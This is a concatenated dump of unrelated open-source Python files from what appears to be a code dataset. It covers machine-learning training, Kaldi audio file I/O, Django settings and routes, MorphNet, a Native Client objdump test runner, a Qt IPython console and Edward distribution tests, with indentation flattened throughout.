wb=xlrd.open_workbook('/srv/oyh/DataBase/SMIC_label.xlsx');
ws=wb.sheet_by_index(0)
colm=ws.col_slice(colx=1,start_rowx=1,end_rowx=None)
vidName=[str(x.value) for x in colm]
colm=ws.col_slice(colx=2,start_rowx=1,end_rowx=None)
expression=[int(x.value) for x in colm]
table=np.transpose(np.array([np.array(vidName),np.array(expression)],dtype=str))
samples=164; #6 samples are excluded
subjects=16;
n_exp=3;
r= 170;w=140;
VidPerSubject = [6,6,39,19,2,4,13,4,7,9,10,10,4,7,2,22];
listOfIgnoredSamples=[];
resizedFlag=1;
else:
print("NOT in the selection.")
######### Reading in the input images ########
SubperdB=[]
for sub in sorted([infile for infile in os.listdir(inputDir)]):
VidperSub=[]
for vid in sorted([inrfile for inrfile in os.listdir(inputDir+sub)]):
path=inputDir + sub + '/'+ vid + '/'
if path in listOfIgnoredSamples:
continue
# print(dB)
# print(path)
imgList=readinput(path,dB)
numFrame=len(imgList)
if resizedFlag ==1:
col=w
row=r
else:
img=cv2.imread(imgList[0])
[row,col,_l]=img.shape
## ##read the label for each input video
collectinglabel(table, sub[3:], vid, workplace+'Classification/', dB)
for var in range(numFrame):
img=cv2.imread(imgList[var])
[_,_,dim]=img.shape
if dim ==3:
img=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
if resizedFlag ==1:
#in resize function, [col,row]
img=cv2.resize(img,(col,row))
if var==0:
FrameperVid=img.flatten()
else:
FrameperVid=np.vstack((FrameperVid,img.flatten()))
VidperSub.append(FrameperVid)
SubperdB.append(VidperSub)
##### Setting up the LSTM model ########
data_dim=r*w # 2500
print(data_dim)
timesteps=10
# LSTM1 = LSTM(2500, return_sequences=True, input_shape=(timesteps, data_dim))
model=Sequential()
# model.add(TimeDistributed(Dense(data_dim), input_shape=(timesteps, data_dim)))
model.add(LSTM(2500, return_sequences=True, input_shape=(timesteps, data_dim)))
model.add(LSTM(500,return_sequences=False))
##model.add(LSTM(500,return_sequences=True))
##model.add(LSTM(50,return_sequences=False))
model.add(Dense(50,activation='sigmoid'))
model.add(Dense(5,activation='sigmoid'))
model.compile(loss='categorical_crossentropy',optimizer='Adam',metrics=[metrics.categorical_accuracy])
#### generate the label based on subjects #########
label=np.loadtxt(workplace+'Classification/'+ dB +'_label.txt')
labelperSub=[]
counter = 0
for sub in range(subjects):
numVid=VidPerSubject[sub]
labelperSub.append(label[counter:counter+numVid])
counter = counter + numVid
##print(np.shape(labelperSub[1]))
##print(labelperSub[1])
######## Seperating the input files into LOSO CV ########
tot_mat=np.zeros((n_exp,n_exp))
for sub in range(subjects):
Train_X=[]
Train_Y=[]
Test_X=SubperdB[sub]
Test_X=np.array(Test_X)
Test_Y=labelperSub[sub]
Test_Yy=np_utils.to_categorical(Test_Y,5)
print(Test_Y)
## print(np.shape(Test_Y))
if sub==0:
for i in range(1,subjects):
Train_X.append(SubperdB[i])
Train_Y.append(labelperSub[i])
elif sub==subjects-1:
for i in range(subjects-1):
Train_X.append(SubperdB[i])
Train_Y.append(labelperSub[i])
else:
for i in range(subjects):
if sub == i:
continue
else:
Train_X.append(SubperdB[i])
Train_Y.append(labelperSub[i])
# print(Train_X)
# Train_X=np.hstack(Train_X)
# print(Train_X.shape)
Train_X=np.vstack(Train_X) # changed to hstack from vstack
# print(Train_X.shape)
# Train_X = Train_X.shape[1:]
# print(Train_X.shape)
# Train_X = np.expand_dims(Train_X, axis=2)
# Train_X = np.reshape(Train_X, Train_X.shape + (1, 1,) )
# Train_X = np.reshape( Train_X, Train_X.shape )
# Train_X = np.reshape(2500, 16077)
print(Train_X.shape)
Train_Y=np.hstack(Train_Y)
Train_Y=np_utils.to_categorical(Train_Y,5)
print (np.shape(Train_Y))
print (np.shape(Train_X))
print (np.shape(Test_Y))
print (np.shape(Test_X))
model.fit(Train_X, Train_Y, validation_split=0.05, epochs=1, batch_size=20)
model.summary()
predict=model.predict_classes(Test_X)
## predict[predict>= 0.5] = 1
## predict[predict<0.5] = 0
print (predict)
print (Test_Y)
#compute the ConfusionMat
ct=confusion_matrix(Test_Y,predict)
#check the order of the CT
order=np.unique(np.concatenate((predict,Test_Y)))
#create an array to hold the CT for each CV
mat=np.zeros((n_exp,n_exp))
#put the order accordingly, in order to form the overall ConfusionMat
for m in range(len(order)):
for n in range(len(order)):
mat[int(order[m]),int(order[n])]=ct[m,n]
tot_mat=mat+tot_mat
# write each CT of each CV into .txt file
if not os.path.exists(workplace+'Classification/'+'Result/'+dB+'/'):
os.mkdir(workplace+'Classification/'+ 'Result/'+dB+'/')
with open(workplace+'Classification/'+ 'Result/'+dB+'/sub_CT.txt','a') as csvfile:
thewriter=csv.writer(csvfile, delimiter=' ')
thewriter.writerow('Sub ' + str(sub+1))
thewriter=csv.writer(csvfile,dialect=csv.excel_tab)
for row in ct:
thewriter.writerow(row)
thewriter.writerow(order)
thewriter.writerow('\n')
if sub==subjects-1:
# compute the accuracy, F1, P and R from the overall CT
microAcc=np.trace(tot_mat)/np.sum(tot_mat)
[f1,p,r]=fpr(tot_mat,n_exp)
# save into a .txt file
with open(workplace+'Classification/'+ 'Result/'+dB+'/final_CT.txt','w') as csvfile:
thewriter=csv.writer(csvfile,dialect=csv.excel_tab)
for row in tot_mat:
thewriter.writerow(row)
thewriter=csv.writer(csvfile, delimiter=' ')
thewriter.writerow('micro:' + str(microAcc))
thewriter.writerow('F1:' + str(f1))
thewriter.writerow('Precision:' + str(p))
thewriter.writerow('Recall:' + str(r))
|
btk20_src/lib/pykaldiarkio.py | musiclvme/distant_speech_recognition | 136 | 12797664 | <reponame>musiclvme/distant_speech_recognition<filename>btk20_src/lib/pykaldiarkio.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# MIT License
#
# Copyright (c) 2018 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Basic classes to read/write a binary Kaldi ark file
"""
import struct, numpy
BFM_SYM = b'BFM '
BIV_SYM = b'B'
FEAT_BYTE_SIZE = b'\x04'
NULLC = b'\0'
WAV_SYM = b'RIFF'
class KaldiArkReader:
"""
Base class for readling a Kaldi ark file
"""
def __init__(self, store_image=False):
"""
Constructor of KaldiArkReader
:params store_image: Every utterance data in the ark file will be kept in RAM if True
"""
self.arkfp = None
self.curr_arkfile = None
if store_image == True:# store all the utterance data into image
self.arkdata = {} # arkdata[ID] = {matrix|vector}
self.uttids = [] # remember the order of utterance IDs in an ark file
else:
self.arkdata = None
self.uttids = None
def __enter__(self):
return self
def __iter__(self):
"""
Read each utterance from the ark file and return it
:returns : Python dictionary that contains the utterance ID as a key and data as a value
"""
raise NotImplemented('Implement this')
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def accumulate(self, uttid, dataelem):
"""
Store all the utterance data into the RAM if this is constructed with store_image = True.
"""
if self.arkdata is None:
self.arkdata = {}
self.uttids = []
self.arkdata[uttid] = dataelem
self.uttids.append(uttid)
def open(self, arkfile):
"""
Set the ark file to be read later
"""
if self.arkfp is not None:
raise IOError('call close() first')
self.arkfp = open(arkfile, 'rb')
self.curr_arkfile = arkfile
def close(self):
"""
Close the file pointer if it is opened
"""
if self.arkfp is not None:
self.arkfp.close()
self.arkfp = None
self.curr_arkfile = None
if self.arkdata is not None:
self.arkdata = {}
self.uttids = []
def seek(self, position_in_bytes):
"""
Skip the file pointer. You can pick up the file position from .scp file
"""
if self.arkfp is not None:
self.arkfp.seek(position_in_bytes, 0)
class KaldiFeatArkReader(KaldiArkReader):
"""
Read a Kaldi .feat.ark file per utterance iteratively
"""
def __init__(self, store_image=False):
KaldiArkReader.__init__(self, store_image)
def __iter__(self):
"""
Return a tuple of an utterance ID and feature matrix
where each row vector correpsonds to a feature vector per frame
:returns: (string, numpy.matrix)
"""
uttid = b''
while True:
arkdata = self.arkfp.read(1)
if arkdata == b'':
raise StopIteration('End of feat ark file')
c = struct.unpack('<s', arkdata)[0]
if c == b' ':
arkdata = self.arkfp.read(1) # skip '\0'
arkdata = self.arkfp.read(4) # read the end symbol 'BFM '
endSym = struct.unpack('<4s', arkdata)[0]
if endSym != BFM_SYM:
raise ValueError('ERROR: %s could not find BFM but %s' %(self.curr_arkfile, endSym))
arkdata = self.arkfp.read(1) # skip one byte data '\x04'
arkdata = self.arkfp.read(4) # read no. frames
frameN = struct.unpack( '<I', arkdata )[0]
arkdata = self.arkfp.read(1) # skip one byte data '\x04'
arkdata = self.arkfp.read(4) # read the dimension
featD = struct.unpack( '<I', arkdata )[0]
coeffN = frameN * featD
# read the coefficients
arkdata = self.arkfp.read(coeffN * 4)
feMat = numpy.reshape(struct.unpack('<%df' %(coeffN), arkdata), (frameN,featD))
uttid = uttid.decode()
if self.arkdata is not None:
self.accumulate(uttid, feMat)
uttid2data = {uttid:feMat}
uttid = b''
yield uttid2data
else:
uttid += c
class KaldiIntVectorArkReader(KaldiArkReader):
"""
Read a Kaldi integer-vector file per utterance iteratively
"""
def __init__(self, store_image=False):
KaldiArkReader.__init__(self, store_image)
def __iter__(self):
"""
Return a tuple of an utterance ID and vector
:returns: (string, numpy.vector)
"""
uttid = b''
while True:
arkdata = self.arkfp.read(1)
if arkdata == b'':
break
c = struct.unpack('<s', arkdata)[0]
if c == b' ':
arkdata = self.arkfp.read(1) # skip '\0'
arkdata = self.arkfp.read(1) # read the end symbol 'B'
endSym = struct.unpack('<s', arkdata)[0]
if endSym != BIV_SYM:
raise ValueError('ERROR: %s: Unmatched symbol %s!=%s' %(self.curr_arkfile, endSym, BIV_SYM))
arkdata = self.arkfp.read(1) # skip one byte data '\x04'
arkdata = self.arkfp.read(4) # read no. frames
frameN = struct.unpack('<i', arkdata)[0]
# read the coefficients
vals = []
for i in range(frameN):
arkdata = self.arkfp.read(1)
arkdata = self.arkfp.read(4)
vals.append(struct.unpack('<i', arkdata)[0])
intVec = numpy.array(vals)
uttid = uttid.decode()
if self.arkdata is not None:
self.accumulate(uttid, intVec)
uttid2data = {uttid:intVec}
uttid = b''
yield uttid2data
else:
uttid += c
class KaldiWavArkReader(KaldiArkReader):
"""
Read a Kaldi .wav.ark file per utterance iteratively
"""
def __init__(self, store_image=False):
KaldiArkReader.__init__(self, store_image)
self.riff_header = None
self.samplerate = None
self.num_channels = None
def get_riff_header(self):
return self.riff_header
def get_samplerate(self):
return self.samplerate
def get_num_channel(self):
return self.num_channels
def __iter__(self):
"""
Return a tuple of an utterance ID and audio samples as a 16-bit integer vector
:returns: (string, numpy.int16 vector)
"""
uttid = b''
while True:
arkdata = self.arkfp.read(1)
if arkdata == b'':
raise StopIteration('End of wav ark file')
c = struct.unpack('<s', arkdata)[0]
if c == b' ':
# read the 44 Byte header block of the RIFF file
riff_header = self.arkfp.read(44) # skip '\0'
endSym = struct.unpack('<4s',riff_header[0:4])[0]
dataLength = struct.unpack('<L', riff_header[40:44])[0]
bitsPerSample = struct.unpack('<h', riff_header[34:36])[0]
# nsamps = int(dataLength / (bitsPerSample/8)) # divide 2 (Byte)
self.samplerate = struct.unpack('<L', riff_header[24:28])[0]
self.num_channels = struct.unpack('<h', riff_header[22:24])[0]
if endSym != WAV_SYM:
raise ValueError('ERROR: %s: could not find %s but %s' %(self.curr_arkfile, WAV_SYM, endSym))
if bitsPerSample != 16:
raise ValueError('ERROR: %s: expecting utterance with int16 format but %d bits per sample.' % (self.curr_arkfile, bitsPerSample))
uttBinary = self.arkfp.read(dataLength)
# expecting 16 bit per sample
uttInt = [struct.unpack('<h', uttBinary[i:i+2]) for i in numpy.arange(0,len(uttBinary), 2)]
samples = numpy.array(numpy.int16(numpy.resize(uttInt, (len(uttInt),))))
self.riff_header = riff_header
uttid = uttid.decode()
if self.arkdata is not None:
self.accumulate(uttid, samples)
uttid2data = {uttid:samples}
uttid = b''
yield uttid2data
else:
uttid += c
class KaldiArkWriter:
"""
Base class for writing a Kaldi ark file
"""
def __init__(self):
self.arkfp = None
def __entry__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def open(self, arkfile):
if self.arkfp is not None:
raise IOError('call close() first')
self.arkfp = open(arkfile, 'wb')
def close(self):
if self.arkfp is not None:
self.arkfp.close()
self.arkfp = None
class KaldiFeatArkWriter(KaldiArkWriter):
"""
Write utterance data as a Kaldi .feat.ark file
"""
def __init__(self):
KaldiArkWriter.__init__(self)
def write(self, uttid2feats, uttids=None):
if uttids is None:
uttids = list(uttid2feats.keys())
for uttid in uttids:
feMat = uttid2feats[uttid]
frameN = len(feMat)
featD = len(feMat[0])
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
outData += struct.pack('<c', NULLC)
for c in BFM_SYM.decode():
outData +=struct.pack('<c', c.encode())
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<I', frameN)
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<I', featD)
self.arkfp.write(outData)
outData = b''
for frameX in range(frameN):
for coeff in feMat[frameX]:
outData += struct.pack('<f', coeff)
self.arkfp.write(outData)
self.arkfp.flush()
class KaldiIntVectorArkWriter(KaldiArkWriter):
"""
Write utterance data as a Kaldi int-vector ark file
"""
def __init__(self):
KaldiArkWriter.__init__(self)
def write(self, uttid2feats, uttids=None):
if uttids is None:
uttids = list(uttid2feats.keys())
for uttid in uttids:
intVec = uttid2feats[uttid]
# write data header
frameN = len(intVec)
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
outData += struct.pack('<c', NULLC)
for c in BIV_SYM.decode():
outData +=struct.pack('<c', c.encode())
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<I', frameN)
self.arkfp.write(outData)
# write actual vector data
outData = b''
for coeff in intVec:
outData += struct.pack('<c', FEAT_BYTE_SIZE)
outData += struct.pack('<i', coeff)
self.arkfp.write(outData)
self.arkfp.flush()
def correct_chunk_size(numSamples, riff_header):
"""
Correct the data length in header information; see http://soundfile.sapp.org/doc/WaveFormat/ for details
"""
bytesPerSample = struct.unpack( '<h', riff_header[34:36] )[0] // 8
dataLength = numSamples * bytesPerSample
totalChunkSize = 36 + dataLength
return (riff_header[0:4] + struct.pack('<L', totalChunkSize) + riff_header[8:40] + struct.pack('<L', dataLength) + riff_header[44:])
class KaldiWavArkWriter(KaldiArkWriter):
"""
Write utterance data as a Kaldi .wav.ark file
"""
def __init__(self):
KaldiArkWriter.__init__(self)
def write(self, uttid2feats, uttid2headers, uttids=None):
if uttids is None:
uttids = list(uttid2feats.keys())
for uttid in uttids:
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
self.arkfp.write(outData)
samples = uttid2feats[uttid]
# write the corrected header information
uttid2header = correct_chunk_size(len(samples), uttid2headers[uttid])
self.arkfp.write(uttid2header)
outData = b''
for samp in samples:
outData += struct.pack('<h', samp)
self.arkfp.write(outData)
self.arkfp.flush()
def dump_riff_file(self, riff_file, uttid):
"""
Dump the data in a RIFF file into the wav ark file
"""
outData = b''
for c in uttid + ' ':
outData += struct.pack('<c', c.encode())
self.arkfp.write(outData)
with open(riff_file, 'rb') as riffF:
self.arkfp.write(riffF.read())
self.arkfp.flush()
def test():
import argparse
def build_parser():
parser = argparse.ArgumentParser(description='List utterance IDs in the ark file')
parser.add_argument('-t', '--type', default='f', help='Ark file type (i/f/w)')
parser.add_argument('input_ark', help='input ark path')
parser.add_argument('output_ark', help='output ark path')
return parser
parser = build_parser()
args, argv = parser.parse_known_args()
if args.type == 'f':
reader = KaldiFeatArkReader()
writer = KaldiFeatArkWriter()
elif args.type == 'w':
reader = KaldiWavArkReader()
writer = KaldiWavArkWriter()
else:
reader = KaldiIntVectorArkReader()
writer = KaldiIntVectorArkWriter()
reader.open(args.input_ark)
writer.open(args.output_ark)
for uttid2data in reader:
print(('uttid: %s' %list(uttid2data.keys())[0]))
if args.type == 'w':
writer.write(uttid2data, {list(uttid2data.keys())[0]:reader.get_riff_header()})
else:
writer.write(uttid2data)
reader.close()
writer.close()
if __name__ == '__main__':
test()
|
apps/paypal/urls.py | youssriaboelseod/pyerp | 115 | 12797687 | # Django Library
from django.urls import path
# Localfolder Library
from .views.paypal_config import UpdatePaypalConfigView
# http://www.secnot.com/django-shop-paypal-rest-1.html
app_name = 'paypal'
urlpatterns = [
path('paypal-config/<int:pk>', UpdatePaypalConfigView.as_view(), name='paypal-config'),
]
|
glucosetracker/settings/production.py | arhanair/glucose-tracker-monitor | 134 | 12797702 | from .base import *
DEBUG = False
TEMPLATE_DEBUG = DEBUG
# Use the cached template loader so template is compiled once and read from
# memory instead of reading from disk on each load.
TEMPLATE_LOADERS = (
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
)
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = ['.glucosetracker.net']
# Make this unique, and don't share it with anybody.
SECRET_KEY = os.environ['DJANGO_SECRET_KEY']
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'glucosetracker',
'USER': os.environ['DATABASE_USER'],
'PASSWORD': os.environ['DATABASE_PASSWORD'],
'HOST': 'localhost',
'PORT': '',
}
}
# 3rd-party apps tracking IDs.
INTERCOM_APP_ID = 'a6d0326564469dfd7f7d9b1bfc909ee3815a85a8'
GOOGLE_ANALYTICS_TRACKING_ID = 'UA-45698014-1'
ADDTHIS_PUBLISHER_ID = 'ra-52fffdf9456ec7d2'
# The 'From:' header of admin-related emails.
DEFAULT_FROM_EMAIL = '<EMAIL>'
ADMINS = (
('Local Admin', '<EMAIL>'),
)
MANAGERS = ADMINS
CONTACTS = {
'support_email': 'GlucoseTracker.net <<EMAIL>>',
'admin_email': '<EMAIL>',
'info_email': 'GlucoseTracker.net <<EMAIL>>',
}
# Subscribers app settings
SEND_SUBSCRIBERS_EMAIL_CONFIRMATION = True
# Django-storages settings
DEFAULT_FILE_STORAGE = 'core.s3utils.MediaRootS3BotoStorage'
AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
AWS_STORAGE_BUCKET_NAME = 'glucosetracker-assets'
AWS_QUERYSTRING_AUTH = False
MEDIA_URL = '//%s.s3.amazonaws.com/%s/' % (AWS_STORAGE_BUCKET_NAME, MEDIA_ROOT) |
morph_net/framework/output_non_passthrough_op_handler.py | MohammadChalaki/morph-net | 1,061 | 12797706 | <gh_stars>1000+
"""OpHandler for OutputNonPassthrough ops.
OutputNonPassthrough ops take their regularizer from the output and do not
passthrough the regularizer to their input. This is the default OpHandler for
ops like Conv2D and MatMul when L1-gamma regularization is used.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from morph_net.framework import op_handler
from morph_net.framework import op_handler_util
class OutputNonPassthroughOpHandler(op_handler.OpHandler):
"""OpHandler implementation for OutputNonPassthrough operations.
These ops take their regularizer from the output and do not
passthrough the regularizer to their input.
"""
@property
def is_source_op(self):
return False
@property
def is_passthrough(self):
return False
def assign_grouping(self, op, op_reg_manager):
"""Assign grouping to the given op and updates the manager.
Args:
op: tf.Operation to assign grouping to.
op_reg_manager: OpRegularizerManager to keep track of the grouping.
"""
# Check if all input ops have groups, or tell the manager to process them.
input_ops = op_handler_util.get_input_ops(op, op_reg_manager)
input_ops_without_group = op_handler_util.get_ops_without_groups(
input_ops, op_reg_manager)
# Check if all output ops have groups, or tell the manager to process them.
output_ops = op_handler_util.get_output_ops(op, op_reg_manager)
output_ops_without_group = op_handler_util.get_ops_without_groups(
output_ops, op_reg_manager)
# Remove non-passthrough ops from outputs ops to group with.
output_ops = op_handler_util.remove_non_passthrough_ops(
output_ops, op_reg_manager)
# Only group with ops that have the same size. Process the ops that have
# mismatched size.
output_ops_to_group, output_ops_to_process = (
op_handler_util.separate_same_size_ops(op, output_ops))
# Also process ungrouped ops.
input_ops_to_process = input_ops_without_group
output_ops_to_process.extend(output_ops_without_group)
# Align op slice sizes if needed.
op_slices = op_reg_manager.get_op_slices(op)
output_op_slices = op_handler_util.get_op_slices(
output_ops_to_group, op_reg_manager)
aligned_op_slice_sizes = op_handler_util.get_aligned_op_slice_sizes(
op_slices, [], output_op_slices)
op_handler_util.reslice_ops([op] + output_ops_to_group,
aligned_op_slice_sizes, op_reg_manager)
# TODO(a1): Consider refactoring this method.
# Repopulate OpSlice data, as ops may have been resliced.
output_op_slices = self._get_output_op_slices(
output_ops_to_group, op_reg_manager)
# Group with inputs and outputs.
op_handler_util.group_op_with_inputs_and_outputs(
op, [], output_op_slices, aligned_op_slice_sizes,
op_reg_manager)
# Reprocess ops.
op_reg_manager.process_ops(output_ops_to_process + input_ops_to_process)
def _group_with_output_slices(
self, op, output_op_slices, op_slices, op_reg_manager):
"""Groups OpSlice of current op with output ops.
Assuming OpSlice of op have been aligned with output, groups the
corresponding OpSlice.
Args:
op: tf.Operation to determine grouping for.
output_op_slices: List of list of OpSlice, with a list per output op.
op_slices: List of OpSlice for current op.
op_reg_manager: OpRegularizerManager to keep track of grouping.
Raises:
ValueError: If sizes for current and output op slices are not the same.
"""
# Assert that op slices for output and current op are aligned.
output_op_slices_sizes = op_handler_util.get_op_slice_sizes(
output_op_slices)
op_slice_sizes = op_handler_util.get_op_slice_sizes([op_slices])
if op_slice_sizes != output_op_slices_sizes:
raise ValueError('Current op and output op have differing slice '
'sizes: {}, {}'.format(
op_slice_sizes, output_op_slices_sizes))
op_handler_util.group_op_with_inputs_and_outputs(
op, [], output_op_slices, op_slice_sizes, op_reg_manager)
def _get_output_op_slices(self, output_ops, op_reg_manager):
"""Returns op slices for outputs.
Args:
output_ops: List of tf.Operation.
op_reg_manager: OpRegularizerManager to keep track of the grouping.
Returns:
A list of list of OpSlice with a list per output op.
"""
return op_handler_util.get_op_slices(output_ops, op_reg_manager)
def create_regularizer(self, _):
raise NotImplementedError('Not a source op.')
|
native_client/src/trusted/validator_ragel/check_dis_section.py | zipated/src | 2,151 | 12797737 | <reponame>zipated/src
#!/usr/bin/python
# Copyright (c) 2013 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import subprocess
import sys
import tempfile
import objdump_parser
import test_format
class RdfaTestRunner(test_format.TestRunner):
SECTION_NAME = 'dis'
def CommandLineOptions(self, parser):
parser.add_option('--objdump',
help='Path to objdump')
def GetSectionContent(self, options, sections):
arch = {32: '-Mi386', 64: '-Mx86-64'}[options.bits]
data = ''.join(test_format.ParseHex(sections['hex']))
# TODO(shcherbina): get rid of custom prefix once
# https://code.google.com/p/nativeclient/issues/detail?id=3631
# is actually fixed.
tmp = tempfile.NamedTemporaryFile(
prefix='tmprdfa_', mode='wb', delete=False)
try:
tmp.write(data)
tmp.close()
objdump_proc = subprocess.Popen(
[options.objdump,
'-mi386', arch, '--target=binary',
'--disassemble-all', '--disassemble-zeroes',
'--insn-width=15',
tmp.name],
stdout=subprocess.PIPE,
# On Windows, builds of binutils based on Cygwin end lines with
# \n while builds of binutils based on MinGW end lines with \r\n.
# The 'universal_newlines' feature makes this work with either one.
universal_newlines=True)
result = ''.join(objdump_parser.SkipHeader(objdump_proc.stdout))
return_code = objdump_proc.wait()
assert return_code == 0, 'error running objdump'
finally:
tmp.close()
os.remove(tmp.name)
return result
def main(argv):
RdfaTestRunner().Run(argv)
if __name__ == '__main__':
main(sys.argv[1:])
|
src/rayoptics/qtgui/ipyconsole.py | wuffi/ray-optics | 106 | 12797740 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright © 2018 <NAME>
""" Support creation of an iPython console, with rayoptics environment
.. Created on Wed Nov 21 21:48:02 2018
.. codeauthor: <NAME>
"""
from PyQt5.QtGui import QColor
from qtconsole.rich_jupyter_widget import RichJupyterWidget
from qtconsole.inprocess import QtInProcessKernelManager
from qtconsole import styles
from IPython.lib import guisupport
import qdarkstyle
from rayoptics.gui.appmanager import ModelInfo
from rayoptics.util import colors
default_template = '''\
QPlainTextEdit, QTextEdit {
background-color: %(bgcolor)s;
background-clip: padding;
color: %(fgcolor)s;
selection-background-color: %(select)s;
}
.inverted {
background-color: %(fgcolor)s;
color: %(bgcolor)s;
}
.error { color: red; }
.in-prompt { color: %(i_color)s; }
.in-prompt-number { font-weight: bold; }
.out-prompt { color: %(o_color)s; }
.out-prompt-number { font-weight: bold; }
'''
def create_ipython_console(gui_parent, opt_model, title, view_width, view_ht):
""" create a iPython console with a rayoptics environment """
def create_light_or_dark_callback(ipy_console):
# if not hasattr(ipy_console, 'background'):
# ipy_console.background = ipy_console.background()
def l_or_d(is_dark):
accent = colors.accent_colors(is_dark)
prompt_style = {
'i_color': accent['cyan'],
'o_color': accent['orange'],
}
if is_dark:
ipy_console.setStyleSheet(
qdarkstyle.load_stylesheet(qt_api='pyqt5'))
# color_defs = {**styles.get_colors('solarized-dark'),
# **prompt_style }
else:
ipy_console.setStyleSheet('')
# color_defs = {**styles.get_colors('solarized-light'),
# **prompt_style }
# ipy_console.style_sheet = default_template%color_defs
# ipy_console._style_sheet_changed()
return l_or_d
if opt_model:
ro_env = {
'gui_parent': gui_parent,
'app': gui_parent.app_manager,
'opm': opt_model,
'sm': opt_model.seq_model,
'osp': opt_model.optical_spec,
'pm': opt_model.parax_model,
'em': opt_model.ele_model,
'pt': opt_model.part_tree,
}
else:
ro_env = {
'gui_parent': gui_parent,
'app': gui_parent.app_manager,
}
ro_setup = 'from rayoptics.environment import *'
# construct the top level widget
ipy_console = ConsoleWidget()
# load the environment
ipy_console.execute_command(ro_setup)
ipy_console.push_vars(ro_env)
mi = ModelInfo(opt_model)
sub_window = gui_parent.add_subwindow(ipy_console, mi)
sub_window.setWindowTitle(title)
sub_window.sync_light_or_dark = create_light_or_dark_callback(ipy_console)
orig_x, orig_y = gui_parent.initial_window_offset()
sub_window.setGeometry(orig_x, orig_y, view_width, view_ht)
sub_window.show()
class ConsoleWidget(RichJupyterWidget):
def __init__(self, customBanner=None, *args, **kwargs):
super().__init__(*args, **kwargs)
if customBanner is not None:
self.banner = customBanner
self.font_size = 6
self.kernel_manager = kernel_manager = QtInProcessKernelManager()
kernel_manager.start_kernel(show_banner=False)
kernel_manager.kernel.gui = 'qt'
self.kernel_client = kernel_client = self.kernel_manager.client()
kernel_client.start_channels()
def stop():
kernel_client.stop_channels()
kernel_manager.shutdown_kernel()
guisupport.get_app_qt().exit()
self.exit_requested.connect(stop)
def push_vars(self, variableDict):
"""
Given a dictionary containing name / value pairs, push those variables
to the Jupyter console widget
"""
self.kernel_manager.kernel.shell.push(variableDict)
def clear(self):
"""
Clears the terminal
"""
self._control.clear()
# self.kernel_manager
def print_text(self, text):
"""
Prints some plain text to the console
"""
self._append_plain_text(text)
def execute_command(self, command):
"""
Execute a command in the frame of the console widget
"""
self._execute(command, False)
|
tests/util/test_transform.py | xiangze/edward | 5,200 | 12797755 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import edward as ed
import numpy as np
import tensorflow as tf
from collections import namedtuple
from edward.models import (
Beta, Dirichlet, DirichletProcess, Gamma, MultivariateNormalDiag,
Normal, Poisson, TransformedDistribution)
from tensorflow.contrib.distributions import bijectors
class test_transform_class(tf.test.TestCase):
def assertSamplePosNeg(self, sample):
num_pos = np.sum((sample > 0.0), axis=0, keepdims=True)
num_neg = np.sum((sample < 0.0), axis=0, keepdims=True)
self.assertTrue((num_pos > 0).all())
self.assertTrue((num_neg > 0).all())
def test_args(self):
with self.test_session():
x = Normal(-100.0, 1.0)
y = ed.transform(x, bijectors.Softplus())
sample = y.sample(10).eval()
self.assertTrue((sample >= 0.0).all())
def test_kwargs(self):
with self.test_session():
x = Normal(-100.0, 1.0)
y = ed.transform(x, bijector=bijectors.Softplus())
sample = y.sample(10).eval()
self.assertTrue((sample >= 0.0).all())
def test_01(self):
with self.test_session():
x = Beta(1.0, 1.0)
y = ed.transform(x)
self.assertIsInstance(y, TransformedDistribution)
sample = y.sample(10, seed=1).eval()
self.assertSamplePosNeg(sample)
def test_nonnegative(self):
with self.test_session():
x = Gamma(1.0, 1.0)
y = ed.transform(x)
self.assertIsInstance(y, TransformedDistribution)
sample = y.sample(10, seed=1).eval()
self.assertSamplePosNeg(sample)
def test_simplex(self):
with self.test_session():
x = Dirichlet([1.1, 1.2, 1.3, 1.4])
y = ed.transform(x)
self.assertIsInstance(y, TransformedDistribution)
sample = y.sample(10, seed=1).eval()
self.assertSamplePosNeg(sample)
def test_real(self):
with self.test_session():
x = Normal(0.0, 1.0)
y = ed.transform(x)
self.assertIsInstance(y, Normal)
sample = y.sample(10, seed=1).eval()
self.assertSamplePosNeg(sample)
def test_multivariate_real(self):
with self.test_session():
x = MultivariateNormalDiag(tf.zeros(2), tf.ones(2))
